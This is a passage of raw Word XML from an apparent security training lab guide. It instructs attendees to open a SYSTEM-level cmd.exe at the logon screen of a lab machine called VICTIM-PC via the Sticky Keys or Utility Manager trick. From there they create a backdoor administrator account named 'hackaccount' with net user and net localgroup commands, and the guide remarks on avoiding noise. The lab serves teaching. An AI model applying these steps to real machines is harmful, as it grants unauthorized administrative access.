        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD928D1" w14:textId="77777777" w:rsidR="00DA573F" w:rsidRDefault="00DA573F" w:rsidP="00F53EC5"/>
    <w:p w14:paraId="45A2A7FB" w14:textId="559A34C8" w:rsidR="00DA573F" w:rsidRDefault="00DA573F" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Shutdown the VICTIM-PC machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3599A5" w14:textId="71947A75" w:rsidR="00B469A0" w:rsidRDefault="00DA573F" w:rsidP="000C6667">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Disconnect the media and boot normally the VICTIM-PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462AD486" w14:textId="682ACBF1" w:rsidR="00DA573F" w:rsidRDefault="00DA573F"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5D739B" w14:paraId="351FC87E" w14:textId="77777777" w:rsidTr="005D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33754689" w14:textId="2194467D" w:rsidR="005D739B" w:rsidRDefault="005D739B" w:rsidP="00F53EC5">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D739B" w14:paraId="0D576EC0" w14:textId="77777777" w:rsidTr="005D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F5B51A2" w14:textId="1CD32945" w:rsidR="0094306C" w:rsidRPr="00DA573F" w:rsidRDefault="005D739B" w:rsidP="005D739B">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Take a screen shot of the change you have made.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B46DA11" w14:textId="08287A92" w:rsidR="005D739B" w:rsidRDefault="005D739B" w:rsidP="00F53EC5"/>
    <w:p w14:paraId="0EF41E02" w14:textId="72FB7E97" w:rsidR="00A01861" w:rsidRDefault="00A01861">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9259F5" w14:textId="4ACB345A" w:rsidR="007D17A0" w:rsidRDefault="007D17A0" w:rsidP="007D17A0">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc44075680"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task 2: </w:t>
      </w:r>
      <w:r w:rsidR="00FC1DDD">
        <w:t xml:space="preserve">Configure </w:t>
      </w:r>
      <w:r w:rsidR="004F21D6">
        <w:t>local admin account</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="70A44E17" w14:textId="151578F9" w:rsidR="006C4FF0" w:rsidRPr="006C4FF0" w:rsidRDefault="006C4FF0" w:rsidP="006C4FF0">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">In this part attendees will use different technique to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>create</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> local administrator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>account</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBA84D4" w14:textId="7BA3B3B0" w:rsidR="00DA573F" w:rsidRDefault="00DA573F" w:rsidP="00DA573F">
      <w:pPr>
        <w:pStyle w:val="Titre6"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA573F">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Admin logon on VICTIM-PC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5231602C" w14:textId="77777777" w:rsidR="00061A6F" w:rsidRPr="00061A6F" w:rsidRDefault="00061A6F" w:rsidP="00061A6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="756DFE96" w14:textId="18145927" w:rsidR="004B3805" w:rsidRPr="00061A6F" w:rsidRDefault="004B3805" w:rsidP="004B3805">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00061A6F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>If you used method 1 in the previous task:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8B101B" w14:textId="4CAE9811" w:rsidR="004B3805" w:rsidRDefault="00DA573F" w:rsidP="004B3805">
      <w:r>
        <w:t>After</w:t>
      </w:r>
      <w:r w:rsidR="004B3805">
        <w:t xml:space="preserve"> system boot, and before to logon, hit at list 5 time the SHIFT key to display cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F5D977" w14:textId="6BE304F8" w:rsidR="004B3805" w:rsidRDefault="004B3805" w:rsidP="004B3805">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Caution: you might have popup on your </w:t>
      </w:r>
      <w:r w:rsidR="008802D8">
        <w:t>own computer instead of virtual machine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A4753C" w14:textId="77777777" w:rsidR="004B3805" w:rsidRDefault="004B3805" w:rsidP="004B3805">
      <w:r w:rsidRPr="00BA3EED">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B5947C6" wp14:editId="68A25800">
            <wp:extent cx="3667125" cy="1586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8250" cy="1591367"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3251D2" w14:textId="77777777" w:rsidR="004B3805" w:rsidRDefault="004B3805" w:rsidP="004B3805">
      <w:r>
        <w:t xml:space="preserve">Select </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>No</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and run again 5 SHIFT keystrokes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B79A2A8" w14:textId="7F42942D" w:rsidR="004B3805" w:rsidRDefault="004B3805" w:rsidP="004B3805">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If cmd.exe open, it will run </w:t>
      </w:r>
      <w:r w:rsidR="008802D8">
        <w:t xml:space="preserve">under </w:t>
      </w:r>
      <w:r>
        <w:t>the LOCAL SYSTEM security context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B83A0D" w14:textId="77777777" w:rsidR="004B3805" w:rsidRDefault="004B3805" w:rsidP="004B3805">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4461D7CE" w14:textId="77777777" w:rsidR="004B3805" w:rsidRDefault="004B3805" w:rsidP="004B3805">
      <w:r>
        <w:t xml:space="preserve">From this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, create a local account and grant him administrator permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A0CC54" w14:textId="77777777" w:rsidR="004B3805" w:rsidRDefault="004B3805" w:rsidP="004B3805">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">net user /add </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hackaccount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Password1</w:t>
      </w:r>
      <w:r>
        <w:t>” to create account with password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCBB231" w14:textId="77777777" w:rsidR="004B3805" w:rsidRDefault="004B3805" w:rsidP="004B3805">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> administrators </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hackaccount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> /add</w:t>
      </w:r>
      <w:r>
        <w:t>” to add this account in local admin group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607FEF6B" w14:textId="77777777" w:rsidR="004B3805" w:rsidRDefault="004B3805" w:rsidP="004B3805">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> administrators</w:t>
      </w:r>
      <w:r>
        <w:t>” to display the group members.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8841B6" w14:textId="2710D21C" w:rsidR="004B3805" w:rsidRDefault="004B3805" w:rsidP="004B3805">
      <w:r>
        <w:t>Note: creating local account member of Administrators local group can be ‘noisy’. You can try otherwise to enable the default administrator account (disable by default during machine setup).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A676DEE" w14:textId="495BB593" w:rsidR="00061A6F" w:rsidRDefault="00061A6F" w:rsidP="004B3805">
      <w:r>
        <w:t xml:space="preserve">Then logon with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00061A6F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hackaccount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00061A6F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">account and password </w:t>
      </w:r>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Password1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5836CFFC" w14:textId="383B8CBE" w:rsidR="00061A6F" w:rsidRDefault="00061A6F" w:rsidP="004B3805">
      <w:r>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and run “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00061A6F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>whoam</w:t>
      </w:r>
      <w:r w:rsidR="008802D8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00061A6F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> /ALL</w:t>
      </w:r>
      <w:r>
        <w:t>” to display the privileges owned by your account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5F609A" w14:textId="77777777" w:rsidR="00061A6F" w:rsidRDefault="00061A6F" w:rsidP="004B3805"/>
    <w:p w14:paraId="6BB563BE" w14:textId="55C4B6B8" w:rsidR="004B3805" w:rsidRPr="00061A6F" w:rsidRDefault="004B3805" w:rsidP="004B3805">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00061A6F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>If you used method 2 in the previous task:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30739BDB" w14:textId="76CA14C9" w:rsidR="00061A6F" w:rsidRDefault="004B3805" w:rsidP="00C6425D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Logon with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.\administrator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> account and no password (blank)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2EF740" w14:textId="5F931B61" w:rsidR="00061A6F" w:rsidRDefault="00061A6F" w:rsidP="00C6425D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and run “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00061A6F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>whoam</w:t>
      </w:r>
      <w:r w:rsidR="008802D8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00061A6F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> /ALL</w:t>
      </w:r>
      <w:r>
        <w:t>” to display the privileges owned by your account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513538B4" w14:textId="4832A289" w:rsidR="006427D4" w:rsidRDefault="006427D4" w:rsidP="00C6425D">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Change the password to </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6425D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Password1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165BFAEE" w14:textId="4F98BF19" w:rsidR="00DA573F" w:rsidRDefault="00DA573F" w:rsidP="004B3805"/>
    <w:p w14:paraId="0E09FD67" w14:textId="298E4795" w:rsidR="004B3805" w:rsidRPr="00061A6F" w:rsidRDefault="004B3805" w:rsidP="004B3805">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00061A6F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">If you used method </w:t>
      </w:r>
      <w:r w:rsidR="00B261DC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00061A6F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> in the previous task:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2980B1F1" w14:textId="5AF860C6" w:rsidR="00DA573F" w:rsidRDefault="00DA573F" w:rsidP="00DA573F">
      <w:r>
        <w:t xml:space="preserve">After system boot, and before to logon, click on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ultiman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> icon </w:t>
      </w:r>
      <w:r w:rsidR="00A27DC9" w:rsidRPr="00A27DC9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1503D33D" wp14:editId="0B2ADB06">
            <wp:extent cx="224996" cy="2190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38" cy="227197"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00A27DC9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to display cmd.exe</w:t>
      </w:r>
      <w:r w:rsidR="00A27DC9">
        <w:t xml:space="preserve"> running in Local System security context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5668FF7D" w14:textId="3376EC2E" w:rsidR="00DA573F" w:rsidRDefault="00DA573F" w:rsidP="00DA573F">
      <w:r w:rsidRPr="00DA573F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="744F6F4F" wp14:editId="1EA6E458">
            <wp:extent cx="3619500" cy="22061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8637" cy="2211669"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A636FAC" w14:textId="3282D091" w:rsidR="004B3805" w:rsidRDefault="004B3805" w:rsidP="004B3805"/>
    <w:p w14:paraId="2B9771E6" w14:textId="77777777" w:rsidR="00A27DC9" w:rsidRDefault="00A27DC9" w:rsidP="00A27DC9">
      <w:r>
        <w:t xml:space="preserve">From this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, create a local account and grant him administrator permissions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF946A4" w14:textId="77777777" w:rsidR="00A27DC9" w:rsidRDefault="00A27DC9" w:rsidP="00A27DC9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">net user /add </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hackaccount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Password1</w:t>
      </w:r>
      <w:r>
        <w:t>” to create account with password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5517E35C" w14:textId="77777777" w:rsidR="00A27DC9" w:rsidRDefault="00A27DC9" w:rsidP="00A27DC9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> administrators </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hackaccount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> /add</w:t>
      </w:r>
      <w:r>
        <w:t>” to add this account in local admin group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107A1BEA" w14:textId="77777777" w:rsidR="00A27DC9" w:rsidRDefault="00A27DC9" w:rsidP="00A27DC9">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">net </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>localgroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> administrators</w:t>
      </w:r>
      <w:r>
        <w:t>” to display the group members.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D3F338" w14:textId="3A75ABC8" w:rsidR="00A27DC9" w:rsidRDefault="00A27DC9" w:rsidP="004B3805">
      <w:r>
        <w:t>Note: creating local account member of Administrators local group can be ‘noisy’. You can try otherwise to enable the default administrator account (disable by default during machine setup).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F77E62" w14:textId="77777777" w:rsidR="00061A6F" w:rsidRDefault="00061A6F" w:rsidP="00061A6F">
      <w:r>
        <w:t xml:space="preserve">Then logon with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00061A6F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hackaccount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00061A6F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">account and password </w:t>
      </w:r>
      <w:r w:rsidRPr="006B131F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Password1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E77B016" w14:textId="534F5932" w:rsidR="00B469A0" w:rsidRDefault="00061A6F" w:rsidP="00061A6F">
      <w:r>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and run “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00061A6F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>whoam</w:t>
      </w:r>
      <w:r w:rsidR="008802D8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00061A6F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> /ALL</w:t>
      </w:r>
      <w:r>
        <w:t>” to display the privileges owned by your account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E24369" w14:textId="288D70AD" w:rsidR="004B3805" w:rsidRDefault="004B3805" w:rsidP="004B3805"/>
    <w:p w14:paraId="4B94FBA3" w14:textId="5E62AFED" w:rsidR="00A01861" w:rsidRPr="00C6425D" w:rsidRDefault="006427D4" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Does </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hackaccount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> created still present in local </w:t>
      </w:r>
      <w:r w:rsidR="00E138C9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>administrators’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> group after computer restart?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D75CFC6" w14:textId="41DD0F34" w:rsidR="003E28E8" w:rsidRDefault="003E28E8" w:rsidP="004B3805"/>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6427D4" w14:paraId="4EB5CD5D" w14:textId="77777777" w:rsidTr="00BB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7698605D" w14:textId="77777777" w:rsidR="006427D4" w:rsidRDefault="006427D4" w:rsidP="00BB3100">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006427D4" w14:paraId="75662880" w14:textId="77777777" w:rsidTr="00BB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94531C" w14:textId="77777777" w:rsidR="006427D4" w:rsidRDefault="006427D4" w:rsidP="00BB3100">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Take a screen shot of the change you have made.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68452958" w14:textId="77777777" w:rsidR="006427D4" w:rsidRDefault="006427D4" w:rsidP="00BB3100">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Provide the method used to allow connecting with local admin privileges on VICTIM-PC.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57947555" w14:textId="2FD2C2FB" w:rsidR="006427D4" w:rsidRPr="00BB3100" w:rsidRDefault="006427D4" w:rsidP="00BB3100">
            <w:pPr>
              <w:rPr>
                <w:i/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Collect “WHOAMI /ALL” output when logged with admin privileges on machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="589D22D1" w14:textId="1F4D9F78" w:rsidR="006427D4" w:rsidRDefault="006427D4" w:rsidP="004B3805"/>
    <w:p w14:paraId="7FEB7583" w14:textId="07082844" w:rsidR="006427D4" w:rsidRDefault="006427D4" w:rsidP="004B3805"/>
    <w:p w14:paraId="5EFD6DFA" w14:textId="77777777" w:rsidR="006427D4" w:rsidRDefault="006427D4" w:rsidP="004B3805"/>
    <w:p w14:paraId="195AB50C" w14:textId="77777777" w:rsidR="00A01861" w:rsidRDefault="00A01861">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
